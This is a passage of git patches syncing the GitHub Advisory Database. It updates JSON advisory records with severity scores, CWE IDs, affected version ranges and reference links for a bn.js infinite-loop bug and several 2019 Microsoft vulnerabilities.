--- a/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json +++ b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-378v-28hj-76wf", - "modified": "2026-02-20T06:30:39Z", + "modified": "2026-02-20T21:18:31Z", "published": "2026-02-20T06:30:39Z", "aliases": [ "CVE-2026-2739" ], + "summary": "bn.js affected by an infinite loop", "details": "This affects versions of the package bn.js before 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "bn.js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.3" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -43,6 +64,14 @@ "type": "WEB", "url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91" }, + { + "type": "PACKAGE", + "url": "https://github.com/indutny/bn.js" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/releases/tag/v5.2.3" + }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301" @@ -53,8 +82,8 @@ "CWE-835" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:18:31Z", "nvd_published_at": "2026-02-20T05:17:53Z" } } \ No newline at end of file From f9abce7787ec8d3759c8b7eadda46dc4abe8e82f Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:33:00 +0000 Subject: [PATCH 25/77] Advisory Database Sync --- .../GHSA-2h53-ffj5-hg3q.json | 13 +++- .../GHSA-2m99-pq2j-5j4f.json | 13 +++- .../GHSA-2r32-rq8q-r57h.json | 13 +++- .../GHSA-32j3-hv3j-q9qq.json | 9 ++- .../GHSA-373m-h49w-9x43.json | 9 ++- .../GHSA-4x8m-3wcx-gv8x.json | 9 ++- .../GHSA-534v-m7q8-9qgf.json | 13 +++- .../GHSA-5qmr-w63r-99q4.json | 13 +++- .../GHSA-78g9-438v-4f34.json | 9 ++- .../GHSA-78hr-8953-5gh6.json | 9 ++- .../GHSA-7j76-3f62-vcf8.json | 9 ++- .../GHSA-7x73-763j-hw4v.json | 13 +++- .../GHSA-89v5-wvp7-3m8g.json | 9 ++- .../GHSA-974f-9h45-g4v4.json | 13 +++- .../GHSA-9j6q-fhff-rr4p.json | 13 +++- .../GHSA-c2cv-vhh7-5wqr.json | 13 +++- .../GHSA-c2qm-98hf-mh5x.json | 9 ++- .../GHSA-ggpr-x33h-6668.json | 13 +++- .../GHSA-gj34-2m5p-98wq.json | 9 ++- .../GHSA-j4m7-8245-9345.json | 9 ++- .../GHSA-j5jh-cv7m-3763.json | 9 ++- .../GHSA-j5p2-jf5p-h3rm.json | 9 ++- .../GHSA-m3wq-w5qf-gpqg.json | 13 +++- .../GHSA-mhjc-pqhq-cf8c.json | 9 ++- .../GHSA-p5w8-9jhp-rccp.json | 13 +++- .../GHSA-qcg4-w26w-fjv8.json | 9 ++- .../GHSA-qvf2-39c6-g8rr.json | 9 ++- .../GHSA-qxww-2h29-62jj.json | 9 ++- .../GHSA-r62x-fmfh-f3x7.json | 13 +++- .../GHSA-rq2v-5grq-h5mc.json | 9 ++- .../GHSA-vmp9-r9rc-8gc7.json | 9 ++- .../GHSA-vw2q-fc9j-fxwx.json | 13 +++- .../GHSA-vw3c-3fmq-qpgq.json | 9 ++- .../GHSA-w8p3-q4q6-xq79.json | 9 ++- .../GHSA-wqw7-2chg-rhcv.json | 9 ++- .../GHSA-xhpj-r5xj-f4j3.json | 13 +++- .../GHSA-g5c7-69g3-565r.json | 2 +- .../GHSA-ghpw-cph8-v3rm.json | 13 +++- .../GHSA-qqrg-hpxx-mmvw.json | 6 +- .../GHSA-2vf2-f656-c2mm.json | 6 +- .../GHSA-52xc-q9g5-mc6m.json | 6 +- .../GHSA-56jh-3q9p-9x3q.json | 6 +- .../GHSA-rhrj-763h-99fq.json | 6 +- .../GHSA-343f-9rcg-8p42.json | 11 +++- .../GHSA-3685-fgwv-ffhc.json | 56 +++++++++++++++++ .../GHSA-3822-8jq8-pqhh.json | 11 +++- .../GHSA-3g7r-h8fj-xc5g.json | 11 +++- .../GHSA-43ww-vg8r-97hv.json | 11 
+++- .../GHSA-5fgx-x2mx-c652.json | 3 +- .../GHSA-5mq8-87c9-qfhc.json | 56 +++++++++++++++++ .../GHSA-5vrw-6f4h-227q.json | 6 +- .../GHSA-5xcj-44v8-p2v3.json | 3 +- .../GHSA-6262-6vhm-9x8v.json | 11 +++- .../GHSA-62hw-x3qq-c7vv.json | 6 +- .../GHSA-68g8-2724-hq79.json | 36 +++++++++++ .../GHSA-6wwj-pg79-rf37.json | 3 +- .../GHSA-79pg-4mv3-p2x9.json | 56 +++++++++++++++++ .../GHSA-7qvf-m2xc-hg57.json | 11 +++- .../GHSA-7vm8-ccqm-97q2.json | 36 +++++++++++ .../GHSA-86qm-25mg-cp7q.json | 60 +++++++++++++++++++ .../GHSA-87jc-9r3r-58w8.json | 6 +- .../GHSA-c49j-5m2h-224g.json | 11 +++- .../GHSA-cgwr-5223-r4pg.json | 4 +- .../GHSA-cq5p-w4x6-m6h3.json | 3 +- .../GHSA-fgjg-x2hx-m8rf.json | 44 ++++++++++++++ .../GHSA-fr87-mwgv-wmcc.json | 11 +++- .../GHSA-gfrr-w669-mfpw.json | 6 +- .../GHSA-gmmc-3vpq-7m4c.json | 11 +++- .../GHSA-h8h3-mqvc-hwrf.json | 11 +++- .../GHSA-h9gf-cpg2-x9mv.json | 56 +++++++++++++++++ .../GHSA-hc23-qvrh-v59g.json | 11 +++- .../GHSA-m23x-mm6q-4qg4.json | 11 +++- .../GHSA-mj9g-3f37-7qv2.json | 11 +++- .../GHSA-mjjq-x58m-rfxp.json | 3 +- .../GHSA-mv55-hjp6-qw4c.json | 44 ++++++++++++++ .../GHSA-pg4q-7rh5-52c9.json | 6 +- .../GHSA-pmgj-wpmq-6xx5.json | 11 +++- .../GHSA-qv8j-hgpc-vrq8.json | 36 +++++++++++ .../GHSA-r4m3-cm43-fxrj.json | 6 +- .../GHSA-r62q-p7vv-vh53.json | 56 +++++++++++++++++ .../GHSA-v754-wvf3-33xx.json | 11 +++- .../GHSA-v859-79r4-4vv5.json | 11 +++- .../GHSA-vmwq-q997-3c46.json | 11 +++- .../GHSA-w246-2vcp-75v8.json | 6 +- .../GHSA-wh2j-26j7-9728.json | 36 +++++++++++ .../GHSA-wrqv-46c5-q67w.json | 11 +++- .../GHSA-x57h-c6qr-3m4q.json | 11 +++- .../GHSA-xpp8-qpcr-c3rg.json | 6 +- 88 files changed, 1111 insertions(+), 166 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-3685-fgwv-ffhc/GHSA-3685-fgwv-ffhc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5mq8-87c9-qfhc/GHSA-5mq8-87c9-qfhc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-68g8-2724-hq79/GHSA-68g8-2724-hq79.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-79pg-4mv3-p2x9/GHSA-79pg-4mv3-p2x9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7vm8-ccqm-97q2/GHSA-7vm8-ccqm-97q2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-86qm-25mg-cp7q/GHSA-86qm-25mg-cp7q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fgjg-x2hx-m8rf/GHSA-fgjg-x2hx-m8rf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h9gf-cpg2-x9mv/GHSA-h9gf-cpg2-x9mv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mv55-hjp6-qw4c/GHSA-mv55-hjp6-qw4c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json diff --git a/advisories/unreviewed/2022/05/GHSA-2h53-ffj5-hg3q/GHSA-2h53-ffj5-hg3q.json b/advisories/unreviewed/2022/05/GHSA-2h53-ffj5-hg3q/GHSA-2h53-ffj5-hg3q.json index 59f7a1233280b..cb507822ca3ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-2h53-ffj5-hg3q/GHSA-2h53-ffj5-hg3q.json +++ b/advisories/unreviewed/2022/05/GHSA-2h53-ffj5-hg3q/GHSA-2h53-ffj5-hg3q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2h53-ffj5-hg3q", - "modified": "2022-05-24T16:53:33Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T16:53:33Z", "aliases": [ "CVE-2019-1199" ], "details": "A remote code execution vulnerability exists in Microsoft Outlook when the software fails to properly handle objects in memory, aka 'Microsoft Outlook Memory Corruption Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, 
diff --git a/advisories/unreviewed/2022/05/GHSA-2m99-pq2j-5j4f/GHSA-2m99-pq2j-5j4f.json b/advisories/unreviewed/2022/05/GHSA-2m99-pq2j-5j4f/GHSA-2m99-pq2j-5j4f.json index 9234288b95566..ee16e8b27a531 100644 --- a/advisories/unreviewed/2022/05/GHSA-2m99-pq2j-5j4f/GHSA-2m99-pq2j-5j4f.json +++ b/advisories/unreviewed/2022/05/GHSA-2m99-pq2j-5j4f/GHSA-2m99-pq2j-5j4f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2m99-pq2j-5j4f", - "modified": "2022-05-24T16:53:28Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:28Z", "aliases": [ "CVE-2019-1145" ], "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1144, CVE-2019-1149, CVE-2019-1150, CVE-2019-1151, CVE-2019-1152.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-119" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2r32-rq8q-r57h/GHSA-2r32-rq8q-r57h.json b/advisories/unreviewed/2022/05/GHSA-2r32-rq8q-r57h/GHSA-2r32-rq8q-r57h.json index fe1dcd8fd126f..c0f26dd1b6a0c 100644 --- a/advisories/unreviewed/2022/05/GHSA-2r32-rq8q-r57h/GHSA-2r32-rq8q-r57h.json +++ b/advisories/unreviewed/2022/05/GHSA-2r32-rq8q-r57h/GHSA-2r32-rq8q-r57h.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2r32-rq8q-r57h", - "modified": "2022-05-24T16:53:29Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:29Z", "aliases": [ "CVE-2019-1152" ], "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1144, CVE-2019-1145, CVE-2019-1149, CVE-2019-1150, CVE-2019-1151.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-32j3-hv3j-q9qq/GHSA-32j3-hv3j-q9qq.json b/advisories/unreviewed/2022/05/GHSA-32j3-hv3j-q9qq/GHSA-32j3-hv3j-q9qq.json index 740d81a9ca786..a72190c558577 100644 --- a/advisories/unreviewed/2022/05/GHSA-32j3-hv3j-q9qq/GHSA-32j3-hv3j-q9qq.json +++ b/advisories/unreviewed/2022/05/GHSA-32j3-hv3j-q9qq/GHSA-32j3-hv3j-q9qq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-32j3-hv3j-q9qq", - "modified": "2022-05-24T16:53:30Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:30Z", "aliases": [ "CVE-2019-1161" ], "details": "An elevation of privilege vulnerability exists when the MpSigStub.exe for Defender allows file deletion in arbitrary locations.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Defender Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + } + ], "affected": [], "references": [ { 
diff --git a/advisories/unreviewed/2022/05/GHSA-373m-h49w-9x43/GHSA-373m-h49w-9x43.json b/advisories/unreviewed/2022/05/GHSA-373m-h49w-9x43/GHSA-373m-h49w-9x43.json index 819260249df62..f59b5664e5a3c 100644 --- a/advisories/unreviewed/2022/05/GHSA-373m-h49w-9x43/GHSA-373m-h49w-9x43.json +++ b/advisories/unreviewed/2022/05/GHSA-373m-h49w-9x43/GHSA-373m-h49w-9x43.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-373m-h49w-9x43", - "modified": "2022-05-24T16:53:29Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:29Z", "aliases": [ "CVE-2019-1147" ], "details": "A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1146, CVE-2019-1155, CVE-2019-1156, CVE-2019-1157.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-4x8m-3wcx-gv8x/GHSA-4x8m-3wcx-gv8x.json b/advisories/unreviewed/2022/05/GHSA-4x8m-3wcx-gv8x/GHSA-4x8m-3wcx-gv8x.json index 19c7b9acd5f35..1477b080be437 100644 --- a/advisories/unreviewed/2022/05/GHSA-4x8m-3wcx-gv8x/GHSA-4x8m-3wcx-gv8x.json +++ b/advisories/unreviewed/2022/05/GHSA-4x8m-3wcx-gv8x/GHSA-4x8m-3wcx-gv8x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4x8m-3wcx-gv8x", - "modified": "2022-05-24T16:53:30Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:30Z", "aliases": [ "CVE-2019-1169" ], "details": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { 
diff --git a/advisories/unreviewed/2022/05/GHSA-534v-m7q8-9qgf/GHSA-534v-m7q8-9qgf.json b/advisories/unreviewed/2022/05/GHSA-534v-m7q8-9qgf/GHSA-534v-m7q8-9qgf.json index c0b20a6068f89..6d08e65c39e89 100644 --- a/advisories/unreviewed/2022/05/GHSA-534v-m7q8-9qgf/GHSA-534v-m7q8-9qgf.json +++ b/advisories/unreviewed/2022/05/GHSA-534v-m7q8-9qgf/GHSA-534v-m7q8-9qgf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-534v-m7q8-9qgf", - "modified": "2022-05-24T16:53:34Z", + "modified": "2026-02-20T21:31:11Z", "published": "2022-05-24T16:53:34Z", "aliases": [ "CVE-2019-1206" ], "details": "A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server, aka 'Windows DHCP Server Denial of Service Vulnerability'. This CVE ID is unique from CVE-2019-1212.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5qmr-w63r-99q4/GHSA-5qmr-w63r-99q4.json b/advisories/unreviewed/2022/05/GHSA-5qmr-w63r-99q4/GHSA-5qmr-w63r-99q4.json index 16781b30626c2..53e73738adc5c 100644 --- a/advisories/unreviewed/2022/05/GHSA-5qmr-w63r-99q4/GHSA-5qmr-w63r-99q4.json +++ b/advisories/unreviewed/2022/05/GHSA-5qmr-w63r-99q4/GHSA-5qmr-w63r-99q4.json 
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5qmr-w63r-99q4",
- "modified": "2022-05-24T16:53:33Z",
+ "modified": "2026-02-20T21:31:10Z",
 "published": "2022-05-24T16:53:33Z",
 "aliases": [
 "CVE-2019-1192"
 ],
 "details": "A security feature bypass vulnerability exists when Microsoft browsers improperly handle requests of different origins, aka 'Microsoft Browsers Security Feature Bypass Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -20,7 +25,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-863"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-78g9-438v-4f34/GHSA-78g9-438v-4f34.json b/advisories/unreviewed/2022/05/GHSA-78g9-438v-4f34/GHSA-78g9-438v-4f34.json
index 3be4080f6f3af..f25fb8773a1d2 100644
--- a/advisories/unreviewed/2022/05/GHSA-78g9-438v-4f34/GHSA-78g9-438v-4f34.json
+++ b/advisories/unreviewed/2022/05/GHSA-78g9-438v-4f34/GHSA-78g9-438v-4f34.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-78g9-438v-4f34",
- "modified": "2022-05-24T16:53:34Z",
+ "modified": "2026-02-20T21:31:11Z",
 "published": "2022-05-24T16:53:34Z",
 "aliases": [
 "CVE-2019-1211"
 ],
 "details": "An elevation of privilege vulnerability exists in Git for Visual Studio when it improperly parses configuration files, aka 'Git for Visual Studio Elevation of Privilege Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-78hr-8953-5gh6/GHSA-78hr-8953-5gh6.json b/advisories/unreviewed/2022/05/GHSA-78hr-8953-5gh6/GHSA-78hr-8953-5gh6.json
index c808be496874a..07f62478635fe 100644
--- a/advisories/unreviewed/2022/05/GHSA-78hr-8953-5gh6/GHSA-78hr-8953-5gh6.json
+++ b/advisories/unreviewed/2022/05/GHSA-78hr-8953-5gh6/GHSA-78hr-8953-5gh6.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-78hr-8953-5gh6",
- "modified": "2022-05-24T16:53:31Z",
+ "modified": "2026-02-20T21:31:10Z",
 "published": "2022-05-24T16:53:31Z",
 "aliases": [
 "CVE-2019-1183"
 ],
 "details": "A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'Windows VBScript Engine Remote Code Execution Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-7j76-3f62-vcf8/GHSA-7j76-3f62-vcf8.json b/advisories/unreviewed/2022/05/GHSA-7j76-3f62-vcf8/GHSA-7j76-3f62-vcf8.json
index c979aed6b8141..587bf0412c412 100644
--- a/advisories/unreviewed/2022/05/GHSA-7j76-3f62-vcf8/GHSA-7j76-3f62-vcf8.json
+++ b/advisories/unreviewed/2022/05/GHSA-7j76-3f62-vcf8/GHSA-7j76-3f62-vcf8.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7j76-3f62-vcf8",
- "modified": "2022-05-24T16:53:27Z",
+ "modified": "2026-02-20T21:31:08Z",
 "published": "2022-05-24T16:53:27Z",
 "aliases": [
 "CVE-2019-0716"
 ],
 "details": "A denial of service vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Denial of Service Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-7x73-763j-hw4v/GHSA-7x73-763j-hw4v.json b/advisories/unreviewed/2022/05/GHSA-7x73-763j-hw4v/GHSA-7x73-763j-hw4v.json
index 3c0f6901881e5..7d3daf103742c 100644
--- a/advisories/unreviewed/2022/05/GHSA-7x73-763j-hw4v/GHSA-7x73-763j-hw4v.json
+++ b/advisories/unreviewed/2022/05/GHSA-7x73-763j-hw4v/GHSA-7x73-763j-hw4v.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-7x73-763j-hw4v",
- "modified": "2022-05-24T16:53:28Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:28Z",
 "aliases": [
 "CVE-2019-1144"
 ],
 "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1145, CVE-2019-1149, CVE-2019-1150, CVE-2019-1151, CVE-2019-1152.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -24,7 +29,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-415"
+ ],
 "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-89v5-wvp7-3m8g/GHSA-89v5-wvp7-3m8g.json b/advisories/unreviewed/2022/05/GHSA-89v5-wvp7-3m8g/GHSA-89v5-wvp7-3m8g.json
index 1837d8099051c..052a84770a2bc 100644
--- a/advisories/unreviewed/2022/05/GHSA-89v5-wvp7-3m8g/GHSA-89v5-wvp7-3m8g.json
+++ b/advisories/unreviewed/2022/05/GHSA-89v5-wvp7-3m8g/GHSA-89v5-wvp7-3m8g.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-89v5-wvp7-3m8g",
- "modified": "2022-05-24T16:53:33Z",
+ "modified": "2026-02-20T21:31:10Z",
 "published": "2022-05-24T16:53:33Z",
 "aliases": [
 "CVE-2019-1200"
 ],
 "details": "A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
diff --git a/advisories/unreviewed/2022/05/GHSA-974f-9h45-g4v4/GHSA-974f-9h45-g4v4.json b/advisories/unreviewed/2022/05/GHSA-974f-9h45-g4v4/GHSA-974f-9h45-g4v4.json
index 81277abe7c89e..132b2b6b60606 100644
--- a/advisories/unreviewed/2022/05/GHSA-974f-9h45-g4v4/GHSA-974f-9h45-g4v4.json
+++ b/advisories/unreviewed/2022/05/GHSA-974f-9h45-g4v4/GHSA-974f-9h45-g4v4.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-974f-9h45-g4v4",
- "modified": "2022-05-24T19:09:53Z",
+ "modified": "2026-02-20T21:31:13Z",
 "published": "2022-05-24T19:09:53Z",
 "aliases": [
 "CVE-2021-21553"
 ],
 "details": "Dell PowerScale OneFS versions 8.1.0-9.1.0 contain an Incorrect User Management vulnerability.under some specific conditions, this can allow the CompAdmin user to elevate privileges and break out of Compliance mode. This is a critical vulnerability and Dell recommends upgrading at the earliest.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -20,7 +25,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-286"
+ ],
 "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-9j6q-fhff-rr4p/GHSA-9j6q-fhff-rr4p.json b/advisories/unreviewed/2022/05/GHSA-9j6q-fhff-rr4p/GHSA-9j6q-fhff-rr4p.json
index 10b0ec6f38c7c..dde386d58eae1 100644
--- a/advisories/unreviewed/2022/05/GHSA-9j6q-fhff-rr4p/GHSA-9j6q-fhff-rr4p.json
+++ b/advisories/unreviewed/2022/05/GHSA-9j6q-fhff-rr4p/GHSA-9j6q-fhff-rr4p.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9j6q-fhff-rr4p",
- "modified": "2022-05-24T16:53:29Z",
+ "modified": "2026-02-20T21:31:09Z",
 "published": "2022-05-24T16:53:29Z",
 "aliases": [
 "CVE-2019-1151"
 ],
 "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1144, CVE-2019-1145, CVE-2019-1149, CVE-2019-1150, CVE-2019-1152.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -24,7 +29,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-787"
+ ],
 "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-c2cv-vhh7-5wqr/GHSA-c2cv-vhh7-5wqr.json b/advisories/unreviewed/2022/05/GHSA-c2cv-vhh7-5wqr/GHSA-c2cv-vhh7-5wqr.json
index c6c30e30640ef..97e5b0a7acfdd 100644
--- a/advisories/unreviewed/2022/05/GHSA-c2cv-vhh7-5wqr/GHSA-c2cv-vhh7-5wqr.json
+++ b/advisories/unreviewed/2022/05/GHSA-c2cv-vhh7-5wqr/GHSA-c2cv-vhh7-5wqr.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c2cv-vhh7-5wqr",
- "modified": "2022-05-24T16:53:33Z",
+ "modified": "2026-02-20T21:31:11Z",
 "published": "2022-05-24T16:53:33Z",
 "aliases": [
 "CVE-2019-1204"
 ],
 "details": "An elevation of privilege vulnerability exists when Microsoft Outlook initiates processing of incoming messages without sufficient validation of the formatting of the messages, aka 'Microsoft Outlook Elevation of Privilege Vulnerability'.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -20,7 +25,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-20"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
